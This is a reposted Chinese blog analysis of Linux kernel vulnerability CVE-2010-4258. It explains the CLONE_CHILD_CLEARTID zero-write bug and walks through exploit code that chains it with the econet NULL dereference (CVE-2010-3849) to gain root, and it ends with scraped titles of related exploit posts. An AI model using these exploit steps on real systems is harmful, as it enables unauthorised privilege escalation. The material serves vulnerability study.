【转】CVE-2010-4258 漏洞分析

一. 漏洞简介

CVE-2010-4258这个漏洞很有意思,主要思路是如果通过clone函数去创建进程,并且带有CLONE_CHILD_CLEARTID标志,那么进程在退出的时候,可以造成内核任意地址写0的bug。PoC代码利用了多个漏洞来达到权限提升的目的。

二. 前置知识 (进程创建、退出)

1.当fork或者clone一个进程在的时候, copy_process执行如下操作:

[cpp] view plaincopy

  1. static struct task_struct *copy_process(unsigned long clone_flags,
  2. unsigned long stack_start,
  3. struct pt_regs *regs,
  4. unsigned long stack_size,
  5. int __user *child_tidptr,
  6. struct pid *pid,
  7. int trace)
  8. {
  9. p->set_child_tid = (clone_flags & CLONE_CHILD_SETTID) ? child_tidptr : NULL;
  10. /*
  11. * Clear TID on mm_release()
  12. */
  13. p->clear_child_tid = (clone_flags & CLONE_CHILD_CLEARTID) ? child_tidptr: NULL;
  14. }

如果clone的flag带有CLONE_CHILD_CLEARTID标志,那么clear_child_tid指针中就会保存应用层传递进来的child_tidptr的地址。

2.应用层调用clone函数,并传递CLONE_CHILD_CLEARTID标志,则child_tidptr指针就会被赋值给子进程的clear_child_tid

[cpp] view plaincopy

  1. clone((int (*)(void *))trigger,
  2. (void *)((unsigned long)newstack + 65536),
  3. CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
  4. &fildes, NULL, NULL, child_tidptr);

3.进程在退出的时候调用do_exit清理资源,调用路径如下:do_exit->exit_mm->mm_release

[cpp] view plaincopy

  1. /*
  2. * If we‘re exiting normally, clear a user-space tid field if
  3. * requested.  We leave this alone when dying by signal, to leave
  4. * the value intact in a core dump, and to save the unnecessary
  5. * trouble, say, a killed vfork parent shouldn‘t touch this mm.
  6. * Userland only wants this done for a sys_exit.
  7. */
  8. if (tsk->clear_child_tid) {
  9. if (!(tsk->flags & PF_SIGNALED) &&
  10. atomic_read(&mm->mm_users) > 1) {
  11. /*
  12. * We don‘t check the error code - if userspace has
  13. * not set up a proper pointer then tough luck.
  14. */
  15. put_user(0, tsk->clear_child_tid);
  16. sys_futex(tsk->clear_child_tid, FUTEX_WAKE,
  17. 1, NULL, NULL, 0);
  18. }
  19. tsk->clear_child_tid = NULL;
  20. }

上述代码中,如果tsk->clear_child_tid不为空,那么其会调用put_user(0, tsk->clear_child_tid);

4.put_user其实是一个宏,具体是__put_user_check函数,它会将tsk->clear_child_tid的值置为0

[cpp] view plaincopy

  1. #define __put_user_check(x,ptr,size)                \
  2. ({                              \
  3. long __pu_err = -EFAULT;                \
  4. __typeof__(*(ptr)) __user *__pu_addr = (ptr);       \
  5. __typeof__(*(ptr)) __pu_val = x;            \
  6. if (likely(access_ok(VERIFY_WRITE, __pu_addr, size)))   \
  7. __put_user_size(__pu_val, __pu_addr, (size),    \
  8. __pu_err);          \
  9. __pu_err;                       \
  10. })

__put_user_check函数会调用access_ok去检查传进来的参数是否合法

[cpp] view plaincopy

  1. #define access_ok(type,addr,size)   _access_ok((unsigned long)(addr),(size))
  2. int _access_ok(unsigned long addr, unsigned long size)
  3. {
  4. if (!size)
  5. return 1;
  6. if (!addr || addr > (0xffffffffUL - (size - 1)))
  7. goto _bad_access;
  8. if (segment_eq(get_fs(), KERNEL_DS))
  9. return 1;
  10. if (memory_start <= addr && (addr + size - 1) < memory_end)
  11. return 1;
  12. _bad_access:
  13. pr_debug("Bad access attempt: pid[%d] addr[%08lx] size[0x%lx]\n",
  14. current->pid, addr, size);
  15. return 0;
  16. }

access_ok也是一个宏,具体函数为_access_ok,其主要对外部传进来的addr和size参数做合法性检查,其中关键调用语句如下

if (segment_eq(get_fs(), KERNEL_DS))
return 1;

# define get_fs() (current_thread_info()->addr_limit)

如果get_fs() = KERNEL_DS,那么_access_ok检查始终返回1.

三. 前置知识(无效地址访问异常)

每当我们访问一个无效地址的时候,系统便会执行do_page_fault去生成异常日志,结束异常进程等。

[cpp] view plaincopy

  1. int do_page_fault(struct pt_regs *regs, unsigned long address,
  2. unsigned int write_access, unsigned int trapno)
  3. {
  4. // ......
  5. die("Oops", regs, (write_access << 15) | trapno, address);
  6. do_exit(SIGKILL);
  7. }

而往往一些内核bug产生的时候就满足get_fs() = KERNEL_DS这个条件,这个很关键。

接下来看看CVE-2010-3849这个漏洞,它主要是一个0地址访问异常漏洞,msg->msg_name可以由用户空间控制,因此可以是个NULL值。接下来的saddr->cookie;这句调用就会造成0地址访问异常。

[cpp] view plaincopy

  1. static int econet_sendmsg(struct kiocb *iocb, struct socket *sock,
  2. struct msghdr *msg, size_t len)
  3. {
  4. struct sock *sk = sock->sk;
  5. struct sockaddr_ec *saddr=(struct sockaddr_ec *)msg->msg_name;
  6. eb->cookie = saddr->cookie;
  7. }

四. 漏洞利用

1.获取需要用到的函数地址

[cpp] view plaincopy

  1. /* Resolve addresses of relevant symbols */
  2. printf("[*] Resolving kernel addresses...\n");
  3. econet_ioctl = get_kernel_sym("econet_ioctl");
  4. econet_ops = get_kernel_sym("econet_ops");
  5. commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
  6. prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

2.申请一块新进程的栈空间

[cpp] view plaincopy

  1. if(!(newstack = malloc(65536))) {
  2. printf("[*] Failed to allocate memory.\n");
  3. return -1;
  4. }

3.处理好需要映射的地址,比较关键

[cpp] view plaincopy

  1. // econet_ops中保存了各个econet函数的地址指针,
  2. // 10 * sizeof(void *)到达econet_ioctl的下一个函数地址
  3. // 再-1,那么清零的时候是清掉了econet_ioctl下个函数地址的高24字节和econet_ioctl函数的高8字节
  4. target = econet_ops + 10 * sizeof(void *) - OFFSET;
  5. // 清掉econet_ioctl函数的高8字节
  6. landing = econet_ioctl << SHIFT >> SHIFT;
  7. // landing按页对齐,map了2个页的内存
  8. payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
  9. PROT_READ | PROT_WRITE | PROT_EXEC,
  10. MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
  11. if ((long)payload == -1) {
  12. rintf("[*] Failed to mmap() at target address.\n");
  13. return -1;
  14. }
  15. // 将提权代码拷贝到landing
  16. memcpy((void *)landing, &trampoline, 1024);

ps.这里要说明一下,这里为什么要把地址映射到(econet_ioctl&0x00FFFFFF)地址范围内,而不是直接将econet_ops指针数组中的econet_ioctl函数地址清零呢。那是因为新版本的linux不允许用户直接调用mmap函数映射0地址了,所以采用了一个很巧妙的小技巧。

可以调用查看下系统最低映射的地址,我这里是65536

4.clone进程

[cpp] view plaincopy

  1. // trigger用来触发CVE-2010-3849漏洞,是一个0地址访问异常
  2. int trigger(int * fildes)
  3. {
  4. int ret;
  5. struct ifreq ifr;
  6. memset(&ifr, 0, sizeof(ifr));
  7. strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
  8. ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
  9. if(ret < 0) {
  10. printf("[*] Failed to set Econet address.\n");
  11. return -1;
  12. }
  13. splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
  14. splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
  15. /* Shouldn‘t get here... */
  16. exit(0);
  17. }
  18. // clone进程,子进程调用trigger触发0地址访问的漏洞,进而将target指向的地址清0
  19. // 即清掉了econet_ioctl函数地址的高8字节
  20. clone((int (*)(void *))trigger,
  21. (void *)((unsigned long)newstack + 65536),
  22. CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
  23. &fildes, NULL, NULL, target);

5.最后ioctl函数触发底层的econet_ioctl函数执行,而econet_ioctl函数的高8字节已经被我们清零了,所以会调用到我们的map地址中,进而触发提权代码获得root权限

[cpp] view plaincopy

  1. sleep(1);
  2. printf("[*] Triggering payload...\n");
  3. ioctl(fildes[2], 0, NULL);

参考文章:

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4258

http://www.exploit-db.com/exploits/15704/

http://hi.baidu.com/wzt85/item/2467d70f893700133a53eed9

时间: 2024-10-12 14:50:46

【转】CVE-2010-4258 漏洞分析的相关文章

Java反序列化漏洞分析

相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 http://www.tuicool.com/articles/ZvMbIne http://www.freebuf.com/vuls/86566.html http://sec.chinabyte.com/435/13618435.shtml http://www.myhack58.com/Articl

PCMan FTP Server缓冲区溢出漏洞分析与利用

简要介绍 这个软件是台湾国立阳明大学医学系的一个学生在大四的时候写的,这个漏洞是有CVE的(CVE-2013-4730),软件应该还挺普及的,这是一个缓冲区溢出漏洞 具体exp可以点这里 实验用poc(其实这里直接对USER命令溢出都是可以的,即不用知道账号密码即可远程代码执行,USER命令的buf距离返回地址是2000) import socket as s from sys import argv # if(len(argv) != 4): print "USAGE: %s host <

【网络安全】Snort漏洞分析规则提取验证全流程讲述

本文以CVE 2014-6034为例进行漏洞分析与验证,包括环境搭建抓包,特征提取验证各个环节. 1.下载软件: ManageEngine OpManager 9 地址:http://manageengine-opmanager.soft32.com/ Kali Linux https://www.kali.org/downloads/ 我下载在是Kali Linux 64 bit ISO 1.0.9a ISO 2.环境搭建 ManageEngine OpManager 9 直接点击安装即可,安

PHPCMS \phpcms\modules\member\index.php 用户登陆SQL注入漏洞分析

catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: POC http://localhost/phpcms_v9/index.php?m=member&c=index&a=login dosubmit=1&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2

CVE-2017-7269—IIS 6.0 WebDAV远程代码执行漏洞分析

漏洞描述: 3月27日,在Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269),漏洞利用PoC开始流传,但糟糕的是这产品已经停止更新了.网上流传的poc下载链接如下. github地址:https://github.com/edwardz246003/IIS_exploit 结合上面的POC,我们对漏洞的成因及利用过程进行了详细的分析.在分析过程中,对poc的exploit利用技巧感到惊叹,多次使用同一个漏洞函数触发,而同一个漏洞同一段漏洞利用代码

CVE-2014-1767 漏洞分析(2015.1)

CVE-2014-1767 漏洞分析 1. 简介 该漏洞是由于Windows的afd.sys驱动在对系统内存的管理操作中,存在着悬垂指针的问题.在特定情况下攻击者可以通过该悬垂指针造成内存的double free漏洞. 实现对漏洞的有效利用,攻击者利用成功可导致权限提升.afd.sys是内核用来管理socket的模块. 影响的系统包括(32bit & 64 bit):  Windows Server 2003 Windows Vista Windows Server 2008 Windows 7

CVE-2016-0143 漏洞分析(2016.4)

CVE-2016-0143漏洞分析 0x00 背景 4月20日,Nils Sommer在exploitdb上爆出了一枚新的Windows内核漏洞PoC.该漏洞影响所有版本的Windows操作系统,攻击者利用成功后可获得权限提升,微软在4月补丁日修复了该漏洞. 0x01 漏洞分析 Nils Sommer并没有说明该漏洞为何种类型的漏洞,咋看崩溃场景会认为是NULL Pointer dereference或者UAF漏洞,粗略分析后,觉得是整数溢出漏洞,但是最后还是将其定义为特殊的NULL Point

一个简单的远程溢出漏洞分析

人生第一个漏洞分析,好激动. 因为从来没有接触过漏洞分析方面,以前也只是看过一点书,所以一直想找个东西练练手,结果翻到了看雪Exploit me的题目,本来以为会很难,结果还是很基础的,适合我这样的新手练手. http://bbs.pediy.com/showthread.php?t=56998 进入正题 首先拿到了一个Windows程序,拖到IDA里打算看一下,结果发现程序逻辑出乎意料的简单.就是一个很常规的SOCKET流程带有一些错误处理. 下面详细说明. mov ebp,eax test

2015年11月数据安全漏洞分析报告

报告核心观点 1.千帆过尽,SQL注入仍"不改" 2.本月金融业漏洞增长尤为突出 3.11月常见数据泄露原因分析 4.解决弱口令安全建议 报告正文 2015年11月,安华每日安全资讯总结发布了126个数据泄密高危漏洞,这些漏洞分别来自乌云.补天.漏洞盒子等平台,涉及8个行业,公司机构.互联 网.交通运输.教育.金融.能源.运营商.政府.漏洞类型涉及,SQL注入.系统漏洞.弱口令等7类,其中SQL注入仍然是漏洞类型的重灾区. 千帆过尽,SQL注入仍"不改" 数据安全问

【转载】Joomla远程代码执行漏洞分析

利用脚本.exp:python jj.py http://123.123.123.123 ->直接GETSHELL python jj.py http://123.123.123.123 "whoami" ->执行命令#author:we8i&90sec import urllib2,urllib,base64 import cookielib,sys,re cj = cookielib.CookieJar() opener = urllib2.build_open